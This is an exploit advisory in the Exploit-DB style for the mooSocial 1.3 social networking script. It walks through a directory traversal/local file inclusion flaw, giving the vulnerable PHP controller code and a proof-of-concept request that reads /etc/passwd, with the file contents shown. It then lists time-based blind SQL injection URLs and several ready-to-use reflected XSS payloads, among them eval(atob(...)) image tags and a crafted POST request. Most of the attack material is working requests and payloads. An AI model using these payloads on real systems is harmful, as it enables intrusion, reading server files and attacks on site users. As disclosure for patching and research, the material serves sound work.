1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 |
########################################################################################### #Exploit Title: mooSocial 1.3 - Multiple Vulnerabilites #Official site: http://www.moosocial.com #Risk Level: High #Exploit Author: Esac #Homepage author : www.iss4m.ma #Last Checked: 22/08/2013 ########################################################################################### +----------+ | OVERVIEW | +----------+ mooSocial is a social networking script built on top of CakePHP 2 framework. It has all the features to build a successful community (e.g. blog, photo, group, event, video, topic...). mooSocial is a premium version { Standard Version : $149 Developer Version : $449 } +-----------------------------------------------------------------------------------+ +----------------------------+ | Directorty Traversal / LFI | +----------------------------+ mooSocial is vulnerable to a directory traversal / local file inclusion vulnerability, as a result, it was possible for an attacker to load webserver-readable files from the local filesystem (and to execute PHP stored on the server). +--------------------+ | How did it work? | +--------------------+ In the PHP code for de mooSocial website, theres a controller called PagesController.php that is used to load static / semi-static pages. The exact name of the page to be loaded is determined by the query string: for example, http://www.server/pages/chat loads the Site chat page, which is stored as a template in the system. i used Burp suite tool to intercept data cuz there is redirection here when we put something else after the root path vuln code : ................... class PagesController extends AppController { public function display() { $path = func_get_args(); $count = count($path); if (!$count) { $this->redirect('/'); } $page = $subpage = $title_for_layout = null; if (!empty($path[0])) { $page = $path[0]; } if (!empty($path[1])) { $subpage = $path[1]; } if (!empty($path[$count - 1])) { $title_for_layout = Inflector::humanize($path[$count - 1]); } $this->set(compact('page', 'subpage', 'title_for_layout')); // check if site is offline $moo_setting = $this->_getSettings(); $uid = $this->Session->read('uid'); if ( !empty( $moo_setting['site_offline'] ) && !is_root_admin( $uid ) ) { $this->layout = ''; $this->set('offline_message', $moo_setting['offline_message']); $this->render('/Elements/misc/offline'); } else $this->render(implode('/', $path)); } } This code is vulnerable to a directory traversal attack: the $path, which is used to load a template, is directly tied to user input (the arguments to the function here are the elements of the query string). By sending URL slashes (/), it was possible to break out of the current directory and traverse via a relative path to any directory in the system. It was also possible to convince CakePHP (the framework used here) to load files without the ctp file extension associated with templates by including a URL null byte (%00) at the end of the URL. +------------------+ | PROOF OF CONCEPT | +------------------+ http://server/pages/../../../../../../../../../../etc/passwd%00 Requet Headers : GET /pages/../../../../../../../../../../etc/passwd%00 HTTP/1.1 Host: server Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Response Headers : HTTP/1.1 404 Not Found Date: Thu, 22 Aug 2013 04:56:29 GMT Server: Apache Set-Cookie: CAKEPHP=r7t684gq0po1spmqpp5634p2l3; expires=Thu, 22-Aug-2013 05:26:29 GMT; path=/ Content-Length: 37338 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Response Raw : //source code of the page ......................... root:x:0:0::/ramdisk/root:/ramdisk/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync ........................ +--------------------------------+ | Time-Based Blind Injection | +--------------------------------+ http://server/blogs/view/{Inject here} Real exploitation : http://server/blogs/view/1 and sleep(2) ==> will pause for 2 seconds and diplay the page after http://server/blogs/view/1 and sleep(10) ==> will pause for 10 seconds and diplay the page after +-----+ | XSS | +-----+ //all XSS tested on Mozila Firefox http://server/tags/view/"><img src="https://www.exploit-db.com/exploits/27871/a" onerror='eval(atob("cHJvbXB0KDEpOw=="))' http://server/albums/ajax_browse/"><img src="https://www.exploit-db.com/exploits/27871/a" onerror='eval(atob("cHJvbXB0KDEpOw=="))' http://server/blogs/ajax_browse/"><img src="https://www.exploit-db.com/exploits/27871/a" onerror='eval(atob("cHJvbXB0KDEpOw=="))' http://server/topics/ajax_browse/"><img src="https://www.exploit-db.com/exploits/27871/a" onerror='eval(atob("cHJvbXB0KDEpOw=="))' http://server/groups/ajax_browse/"><img src="https://www.exploit-db.com/exploits/27871/a" onerror='eval(atob("cHJvbXB0KDEpOw=="))' http://server/videos/ajax_browse/"><img src="https://www.exploit-db.com/exploits/27871/a" onerror='eval(atob("cHJvbXB0KDEpOw=="))' //The input is reflected inside <script> tag between single quotes http://server/groups/view/10/video_id:'';!--'<XSS>=&{()} http://server/groups/view/10/topic_id:'';!--'<XSS>=&{()} XSS via Post method : POST /videos/ajax_embed HTTP/1.1 Content-Length: 75 Content-Type: application/x-www-form-urlencoded Cookie: CAKEPHP=u3e5q7ut90nhcg7ao1e9c8tni4; mooSocial[language]=Q2FrZQ%3D%3D.9%2F79; mooSocial[theme]=Q2FrZQ%3D%3D.%2FvHjC2hN; mooSocial[activity_feed]=Q2FrZQ%3D%3D.9%2Bb%2FFmVNBY8%3D Host: server Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept: */* source=youtube&source_id=" onmouseover=prompt(976681) bad=" +--------------------------------------------------------------------------------------+ Knowledge is not an Object , it's a flaw :) Greetz : White Tarbouch TEAM - Cobra WwW.Iss4m.Ma ./Issam IEBOUBEN Aka Esac |